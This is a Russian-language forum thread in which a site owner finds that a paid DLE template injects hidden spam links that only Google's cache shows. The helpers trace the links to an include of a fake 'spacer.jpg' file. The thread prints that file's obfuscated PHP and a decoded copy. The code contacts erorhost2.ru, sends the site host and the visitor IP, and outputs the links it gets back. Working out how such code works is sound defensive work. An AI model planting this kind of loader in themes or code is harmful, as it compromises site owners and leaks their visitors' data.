Здравствуйте. Установил новый шаблон ДЛЕ. Всё было нормально и вот спустя несколько дней перешёл в кэш (Сохранённую копию) Гугла и там увидел следующие ссылки: Самое интересное, что я не вижу подобных ссылок. Смотрел код в разных браузерах, заходил через анонимные прокси - ничего нет! Изучал файлы шаблона, вроде все коды в tpl - файлах стандартные для ДЛЕ, смотрел CSS, графические файлы... Не знаю на первый взгляд ничего скрытого в шаблоне нет. В общем Гугл видит ссылки, а я нет. Если кто знает, посоветуйте пожалуйста, что можно сделать в данной ситуации. Шаблон пока поменял на старый.
Интересно, как ты узнал какой сайт его? Их тысячи http://siteexplorer.search.yahoo.com/search?p=http://sn27.net/&fr=sfp&bwm=i freeman22, для начала заюзай "Антивирус" в админке DLE.
Просмотри .js фаилы. Вполне возможно, что проиклудили его в шаблон, либо изменили существующий. с примерно таким содержанием(*.js): + может быть криптован\зашифрован
Вот кэш этого шаблона, посмотрите там где логин есть цифра 1 и перед ней эти ссылки. И посмотрите сейчас какой шаблон, там этих ссылок нет!
Кстати он не бесплатный покупал здесь http://plati.ru/asp/pay.asp?id_d=927804&searchstr=youporn.ru&agent=0 Если кто сможет разобраться, где зашили эти ссылки буду благодарен. Но деле именно в шаблоне!!! Сейчас на сайте стоит другой шаблон и Гугл не показывает никаких ссылок скрытых!
в login.tpl PHP: $void = include ($tpl->dir.'/images/spacer.jpg'); инклюдит файл ./images/spacer.jpg там PHP: <?php $x0f="\146il\x65"; $x10="\x66\163\157c\153o\x70e\x6e"; $x11="\151\155\160\x6c\x6f\x64e"; $x0b = @$x10("\x65\x72o\x72\x68\157st\062.r\165", 80, $x0c, $x0d, 6); if(!$x0b){return ''; }else{$x0e = @$x0f("ht\164\x70\072\057\057ero\162\x68\157st2\056\x72\x75\057\151d\x32\x2e\160\x68\x70\077\163\x69\x74e\075$_SERVER[HTTP_HOST]&\151\160\075$_SERVER[REMOTE_ADDR]");return $x11('',$x0e); } ?> Декодированный PHP: $x0b = @fsockopen("erorhost2.ru", 80, $x0c, $x0d, 6); if(!$x0b){ return ''; }else{ $x0e = @file("http://erorhost2.ru/id2.php?site=$_SERVER[HTTP_HOST]&ip=$_SERVER[REMOTE_ADDR]"); return implode('',$x0e); } http://www.google.ru/search?sourceid=chrome&ie=UTF-8&q=erorhost2
попугай, большое спасибо! Убрал в tpl строчку с инклудом и удалил spacer.jpg. Вернул шаблон, надеюсь ссылок этих больше в кэше Гугла не увижу. P.S.Вот такую "заразу" можно и за деньги купить. Жалко, что на plati.ru претензии (с целью возврата средств) принимаются только в течении 3 дней с момента покупки товара. Рано обрадовался. Если просто зайти на сайт, не под админ-аккаунтом, то видна пустая страница, если вернуть $void = include ($tpl->dir.'/images/spacer.jpg'); , но при этом удалить spacer.jpg , то
Ну, естественно, удалить нужно было не одну строчку. Вот готовый login.tpl http://pastebin.com/UfHPTxei
Платный шаблон еще и ссылками, в обще бес предел, такое еще в бесплатных не встречал, а в общем нужно тщательно проверять все файлы, много всяких уловок придумают, а потом удивляешься по чему взломали и или повесили табличку на сайт.
